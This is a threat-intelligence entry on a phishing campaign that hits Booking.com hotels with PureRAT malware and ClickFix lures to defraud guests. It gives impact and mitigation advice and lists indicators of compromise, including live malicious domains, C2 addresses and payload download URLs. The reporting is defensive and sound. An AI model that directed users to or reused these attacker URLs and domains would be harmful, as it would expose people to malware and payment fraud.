Booking.com Phishing Campaign Targeting Hotels and Customers
A sophisticated phishing campaign targets Booking. com hotel partners and their customers by compromising hotel administrators' systems with malware like PureRAT. Attackers gain access to booking management accounts and trick guests into paying twice for reservations through spear-phishing emails impersonating Booking. com. The campaign uses social engineering tactics such as ClickFix, malicious sites, and a complex infrastructure involving compromised legitimate websites and bulletproof hosting. This operation is part of a broader cybercrime ecosystem offering specialized services to facilitate attacks on booking platforms. The threat impacts confidentiality and financial integrity of hotel bookings and customer payments. European hospitality businesses relying on Booking. com are at risk, especially in countries with large tourism sectors. Mitigation requires targeted security controls on hotel admin systems, user awareness training, and monitoring for unusual booking activities.
AI Analysis
Technical Summary
This threat involves a multi-stage phishing campaign targeting the hospitality sector, specifically Booking.com partners and their customers. Attackers first deploy malware such as PureRAT to compromise hotel administrators' systems, enabling them to access booking management accounts. With these credentials, they conduct fraudulent schemes that trick hotel guests into paying twice for their reservations. The phishing emails are highly targeted spear-phishing attempts impersonating Booking.com, leveraging the ClickFix social engineering tactic to redirect victims to malicious websites designed to harvest credentials or payment information. The attackers operate a sophisticated infrastructure comprising compromised legitimate websites, traffic distribution systems, and bulletproof hosting to evade detection and maintain persistence. This campaign is part of a larger cybercrime ecosystem where specialized services are traded on underground forums, facilitating attacks on booking platforms. The tactics used include credential access, malware deployment, social engineering, and infrastructure abuse, reflecting a well-resourced and organized threat actor. The absence of known exploits in the wild suggests the campaign is ongoing but not yet widely automated or weaponized beyond targeted attacks.
Potential Impact
For European organizations, particularly hotels partnered with Booking.com, the impact includes financial losses due to fraudulent double payments and potential reputational damage from customer trust erosion. Compromise of hotel administrators' systems threatens the confidentiality and integrity of booking data, potentially exposing sensitive customer information. Disruption of booking processes can affect availability and operational continuity. The financial fraud directly harms customers, which could lead to regulatory scrutiny under GDPR for mishandling personal data and payment information. The hospitality sector in Europe is a critical economic driver, so widespread exploitation could have broader economic repercussions. Additionally, the use of compromised legitimate websites and bulletproof hosting complicates incident response and attribution, increasing the operational burden on security teams.
Mitigation Recommendations
European hotels should implement robust endpoint protection and regularly scan for malware like PureRAT on administrative systems. Enforce multi-factor authentication (MFA) on all booking management and administrative accounts to reduce the risk of credential compromise. Conduct targeted spear-phishing awareness training for hotel staff, emphasizing recognition of Booking.com impersonation and the ClickFix tactic. Monitor booking systems for anomalies such as duplicate payments or unusual access patterns. Collaborate with Booking.com to verify suspicious transactions and share threat intelligence. Employ web filtering and DNS security solutions to block access to known malicious domains and traffic distribution systems. Regularly audit and patch all systems, even if no specific patches are listed, to reduce attack surface. Establish incident response plans tailored to phishing and credential compromise scenarios. Engage with law enforcement and cybersecurity communities to track evolving infrastructure used by attackers.
Affected Countries
France, Spain, Italy, Germany, United Kingdom, Netherlands, Portugal, Greece, Austria, Switzerland
Indicators of Compromise
- ip: 85.208.84.94
- domain: sqwqwasresbkng.com
- hash: 32108a830908f88f9949d6c0cbbaea2e
- hash: 51b0c87f9956b1c0a2a9288682cfdbae
- hash: 799e73863806df2964d80d12ce4e61ea
- hash: a3cc88c9d37b9007e5b6d3446bf9e1e4
- hash: d4845669f7f56c6c4eb82147a1f82615
- hash: 25f6e7cf30010425523d88c02b4cd147ee8eedf1
- hash: 6cad060b2934c422945c5d706b0701a42e02c145
- hash: c3eba229c847caa61117c3d0f84efaec7f33a2f7
- hash: e4885686dc64aeaae61eb67ca715ce4b7e07b670
- hash: 5301f5a3fb8649edb0a5768661d197f872d40cfe7b8252d482827ea27077c1ec
- hash: 64838e0a3e2711b62c4f0d2db5a26396ac7964e31500dbb8e8b1049495b5d1f3
- hash: 703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1
- hash: 9bab404584f6a0d9d82112d6e017cfa37d0094d97e510101d6a0132fd145dd32
- ip: 77.83.207.106
- url: http://77.83.207.106:56001
- url: http://85.208.84.94:56001
- url: http://activatecapagm.com/j8r3
- url: http://bkngpropadm.com/bomla
- url: http://bkngssercise.com/bomla
- url: http://bknqsercise.com/bomla
- url: http://bqknsieasrs.com/loggqibkng
- url: http://brownsugarcheesecakebar.com/ajm4
- url: http://byliljedahl.com/8anf
- url: http://byliljedahl.com/lv6q
- url: http://cabinetifc.com/upseisser.zip
- url: http://cardverify0006-booking.com/37858999
- url: http://confirmation8324-booking.com/17149438
- url: http://confirmation887-booking.com/17149438
- url: http://cquopymaiqna.com/bomla
- url: http://ctrlcapaserc.com/bomla
- url: http://ctrlcapaserc.com/loggqibkng
- url: http://customvanityco.com/izsb
- url: http://emprotel.net.bo/updserc.zip
- url: http://guest03442-booking.com/17149438
- url: http://hareandhosta.com/95xh
- url: http://headkickscountry.com/lz1y
- url: http://homelycareinc.com/po7r
- url: http://jamerimprovementsllc.com/ao9o
- url: http://seedsuccesspath.com/6m8a
- url: http://verifycard45625-expedia.com/67764524
- url: http://verifyguest02667-booking.com/17149438
- url: http://zenavuurwerkofficial.com/62is
- domain: activatecapagm.com
- domain: admin-extranet-reservationsexp.com
- domain: admin-extranet-reservationsinfos.com
- domain: admin-extranetadm-captcha.com
- domain: admin-extranetadmns-captcha.com
- domain: admin-extranetmngrxz-captcha.com
- domain: admin-extranetmnxz-captcha.com
- domain: admin-extranetrservq-cstmrq.com
- domain: aidaqosmaioa.com
- domain: api-notification-centeriones.com
- domain: bkngpropadm.com
- domain: bkngssercise.com
- domain: bknqsercise.com
- domain: booking-agreementaprilreviews042025.com
- domain: booking-agreementstatementapril0225.com
- domain: booking-agreementstatementapril0429.com
- domain: booking-aprilreviewstir-9650233.com
- domain: booking-confview-doc-00097503843.com
- domain: booking-confviewdocum-0079495902.com
- domain: booking-refguestitem-09064111.com
- domain: booking-reservationinfosid0251358.com
- domain: booking-reservationsdetail-id0025911.com
- domain: booking-reviewsguestpriv-10101960546.com
- domain: booking-viewdocdetails-0975031.com
- domain: booking-visitorviewdetails-64464043.com
- domain: bookingadmin-updateofmay2705.com
- domain: bookreservfadrwer-customer.com
- domain: bqknsieasrs.com
- domain: breserve-custommessagehelp.com
- domain: brownsugarcheesecakebar.com
- domain: byliljedahl.com
- domain: cabinetifc.com
- domain: cardverify0006-booking.com
- domain: caspqisoals.com
- domain: comsquery.com
- domain: confirmation8324-booking.com
- domain: confirmation887-booking.com
- domain: confirminfo-hotel20may05.com
- domain: confsvisitor-missing-items.com
- domain: confvisitor-doc.com
- domain: contmasqueis.com
- domain: cquopymaiqna.com
- domain: ctrlcapaserc.com
- domain: customvanityco.com
- domain: eiscoaqscm.com
- domain: emprotel.net.bo
- domain: extranet-admin-reservationssept.com
- domain: guest03442-booking.com
- domain: guestinfo-aboutstay1205.com
- domain: guesting-servicesid91202.com
- domain: hareandhosta.com
- domain: headkickscountry.com
- domain: homelycareinc.com
- domain: jamerimprovementsllc.com
- domain: mccp-logistics.com
- domain: mccplogma.com
- domain: reserv-captchaapril04152025.com
- domain: seedsuccesspath.com
- domain: update-info1676.com
- domain: update-infos616.com
- domain: verifycard45625-expedia.com
- domain: verifyguest02667-booking.com
- domain: whooamisercise.com
- domain: whooamisercisea.com
- domain: zenavuurwerkofficial.com
- domain: action.properties.company
- domain: destination.geo.country
Booking.com Phishing Campaign Targeting Hotels and Customers
Description
A sophisticated phishing campaign targets Booking. com hotel partners and their customers by compromising hotel administrators' systems with malware like PureRAT. Attackers gain access to booking management accounts and trick guests into paying twice for reservations through spear-phishing emails impersonating Booking. com. The campaign uses social engineering tactics such as ClickFix, malicious sites, and a complex infrastructure involving compromised legitimate websites and bulletproof hosting. This operation is part of a broader cybercrime ecosystem offering specialized services to facilitate attacks on booking platforms. The threat impacts confidentiality and financial integrity of hotel bookings and customer payments. European hospitality businesses relying on Booking. com are at risk, especially in countries with large tourism sectors. Mitigation requires targeted security controls on hotel admin systems, user awareness training, and monitoring for unusual booking activities.
AI-Powered Analysis
Technical Analysis
This threat involves a multi-stage phishing campaign targeting the hospitality sector, specifically Booking.com partners and their customers. Attackers first deploy malware such as PureRAT to compromise hotel administrators' systems, enabling them to access booking management accounts. With these credentials, they conduct fraudulent schemes that trick hotel guests into paying twice for their reservations. The phishing emails are highly targeted spear-phishing attempts impersonating Booking.com, leveraging the ClickFix social engineering tactic to redirect victims to malicious websites designed to harvest credentials or payment information. The attackers operate a sophisticated infrastructure comprising compromised legitimate websites, traffic distribution systems, and bulletproof hosting to evade detection and maintain persistence. This campaign is part of a larger cybercrime ecosystem where specialized services are traded on underground forums, facilitating attacks on booking platforms. The tactics used include credential access, malware deployment, social engineering, and infrastructure abuse, reflecting a well-resourced and organized threat actor. The absence of known exploits in the wild suggests the campaign is ongoing but not yet widely automated or weaponized beyond targeted attacks.
Potential Impact
For European organizations, particularly hotels partnered with Booking.com, the impact includes financial losses due to fraudulent double payments and potential reputational damage from customer trust erosion. Compromise of hotel administrators' systems threatens the confidentiality and integrity of booking data, potentially exposing sensitive customer information. Disruption of booking processes can affect availability and operational continuity. The financial fraud directly harms customers, which could lead to regulatory scrutiny under GDPR for mishandling personal data and payment information. The hospitality sector in Europe is a critical economic driver, so widespread exploitation could have broader economic repercussions. Additionally, the use of compromised legitimate websites and bulletproof hosting complicates incident response and attribution, increasing the operational burden on security teams.
Mitigation Recommendations
European hotels should implement robust endpoint protection and regularly scan for malware like PureRAT on administrative systems. Enforce multi-factor authentication (MFA) on all booking management and administrative accounts to reduce the risk of credential compromise. Conduct targeted spear-phishing awareness training for hotel staff, emphasizing recognition of Booking.com impersonation and the ClickFix tactic. Monitor booking systems for anomalies such as duplicate payments or unusual access patterns. Collaborate with Booking.com to verify suspicious transactions and share threat intelligence. Employ web filtering and DNS security solutions to block access to known malicious domains and traffic distribution systems. Regularly audit and patch all systems, even if no specific patches are listed, to reduce attack surface. Establish incident response plans tailored to phishing and credential compromise scenarios. Engage with law enforcement and cybersecurity communities to track evolving infrastructure used by attackers.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/"]
- Adversary
- null
- Pulse Id
- 690dba690d5c272baae78d78
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip85.208.84.94 | — | |
ip77.83.207.106 | — |
Domain
| Value | Description | Copy |
|---|---|---|
domainsqwqwasresbkng.com | — | |
domainactivatecapagm.com | — | |
domainadmin-extranet-reservationsexp.com | — | |
domainadmin-extranet-reservationsinfos.com | — | |
domainadmin-extranetadm-captcha.com | — | |
domainadmin-extranetadmns-captcha.com | — | |
domainadmin-extranetmngrxz-captcha.com | — | |
domainadmin-extranetmnxz-captcha.com | — | |
domainadmin-extranetrservq-cstmrq.com | — | |
domainaidaqosmaioa.com | — | |
domainapi-notification-centeriones.com | — | |
domainbkngpropadm.com | — | |
domainbkngssercise.com | — | |
domainbknqsercise.com | — | |
domainbooking-agreementaprilreviews042025.com | — | |
domainbooking-agreementstatementapril0225.com | — | |
domainbooking-agreementstatementapril0429.com | — | |
domainbooking-aprilreviewstir-9650233.com | — | |
domainbooking-confview-doc-00097503843.com | — | |
domainbooking-confviewdocum-0079495902.com | — | |
domainbooking-refguestitem-09064111.com | — | |
domainbooking-reservationinfosid0251358.com | — | |
domainbooking-reservationsdetail-id0025911.com | — | |
domainbooking-reviewsguestpriv-10101960546.com | — | |
domainbooking-viewdocdetails-0975031.com | — | |
domainbooking-visitorviewdetails-64464043.com | — | |
domainbookingadmin-updateofmay2705.com | — | |
domainbookreservfadrwer-customer.com | — | |
domainbqknsieasrs.com | — | |
domainbreserve-custommessagehelp.com | — | |
domainbrownsugarcheesecakebar.com | — | |
domainbyliljedahl.com | — | |
domaincabinetifc.com | — | |
domaincardverify0006-booking.com | — | |
domaincaspqisoals.com | — | |
domaincomsquery.com | — | |
domainconfirmation8324-booking.com | — | |
domainconfirmation887-booking.com | — | |
domainconfirminfo-hotel20may05.com | — | |
domainconfsvisitor-missing-items.com | — | |
domainconfvisitor-doc.com | — | |
domaincontmasqueis.com | — | |
domaincquopymaiqna.com | — | |
domainctrlcapaserc.com | — | |
domaincustomvanityco.com | — | |
domaineiscoaqscm.com | — | |
domainemprotel.net.bo | — | |
domainextranet-admin-reservationssept.com | — | |
domainguest03442-booking.com | — | |
domainguestinfo-aboutstay1205.com | — | |
domainguesting-servicesid91202.com | — | |
domainhareandhosta.com | — | |
domainheadkickscountry.com | — | |
domainhomelycareinc.com | — | |
domainjamerimprovementsllc.com | — | |
domainmccp-logistics.com | — | |
domainmccplogma.com | — | |
domainreserv-captchaapril04152025.com | — | |
domainseedsuccesspath.com | — | |
domainupdate-info1676.com | — | |
domainupdate-infos616.com | — | |
domainverifycard45625-expedia.com | — | |
domainverifyguest02667-booking.com | — | |
domainwhooamisercise.com | — | |
domainwhooamisercisea.com | — | |
domainzenavuurwerkofficial.com | — | |
domainaction.properties.company | — | |
domaindestination.geo.country | — |
Hash
| Value | Description | Copy |
|---|---|---|
hash32108a830908f88f9949d6c0cbbaea2e | — | |
hash51b0c87f9956b1c0a2a9288682cfdbae | — | |
hash799e73863806df2964d80d12ce4e61ea | — | |
hasha3cc88c9d37b9007e5b6d3446bf9e1e4 | — | |
hashd4845669f7f56c6c4eb82147a1f82615 | — | |
hash25f6e7cf30010425523d88c02b4cd147ee8eedf1 | — | |
hash6cad060b2934c422945c5d706b0701a42e02c145 | — | |
hashc3eba229c847caa61117c3d0f84efaec7f33a2f7 | — | |
hashe4885686dc64aeaae61eb67ca715ce4b7e07b670 | — | |
hash5301f5a3fb8649edb0a5768661d197f872d40cfe7b8252d482827ea27077c1ec | — | |
hash64838e0a3e2711b62c4f0d2db5a26396ac7964e31500dbb8e8b1049495b5d1f3 | — | |
hash703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1 | — | |
hash9bab404584f6a0d9d82112d6e017cfa37d0094d97e510101d6a0132fd145dd32 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://77.83.207.106:56001 | — | |
urlhttp://85.208.84.94:56001 | — | |
urlhttp://activatecapagm.com/j8r3 | — | |
urlhttp://bkngpropadm.com/bomla | — | |
urlhttp://bkngssercise.com/bomla | — | |
urlhttp://bknqsercise.com/bomla | — | |
urlhttp://bqknsieasrs.com/loggqibkng | — | |
urlhttp://brownsugarcheesecakebar.com/ajm4 | — | |
urlhttp://byliljedahl.com/8anf | — | |
urlhttp://byliljedahl.com/lv6q | — | |
urlhttp://cabinetifc.com/upseisser.zip | — | |
urlhttp://cardverify0006-booking.com/37858999 | — | |
urlhttp://confirmation8324-booking.com/17149438 | — | |
urlhttp://confirmation887-booking.com/17149438 | — | |
urlhttp://cquopymaiqna.com/bomla | — | |
urlhttp://ctrlcapaserc.com/bomla | — | |
urlhttp://ctrlcapaserc.com/loggqibkng | — | |
urlhttp://customvanityco.com/izsb | — | |
urlhttp://emprotel.net.bo/updserc.zip | — | |
urlhttp://guest03442-booking.com/17149438 | — | |
urlhttp://hareandhosta.com/95xh | — | |
urlhttp://headkickscountry.com/lz1y | — | |
urlhttp://homelycareinc.com/po7r | — | |
urlhttp://jamerimprovementsllc.com/ao9o | — | |
urlhttp://seedsuccesspath.com/6m8a | — | |
urlhttp://verifycard45625-expedia.com/67764524 | — | |
urlhttp://verifyguest02667-booking.com/17149438 | — | |
urlhttp://zenavuurwerkofficial.com/62is | — |
Threat ID: 690dbd8a03ca3124669e0ec2
Added to database: 11/7/2025, 9:36:10 AM
Last enriched: 1/14/2026, 2:38:06 PM
Last updated: 2/6/2026, 11:50:08 AM
Views: 362
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
ThreatFox IOCs for 2026-02-05
MediumTechnical Analysis of Marco Stealer
MediumNew Clickfix variant 'CrashFix' deploying Python Remote Access Trojan
MediumKnife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework
MediumSystemBC Infects 10,000 Devices After Defying Law Enforcement Takedown
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.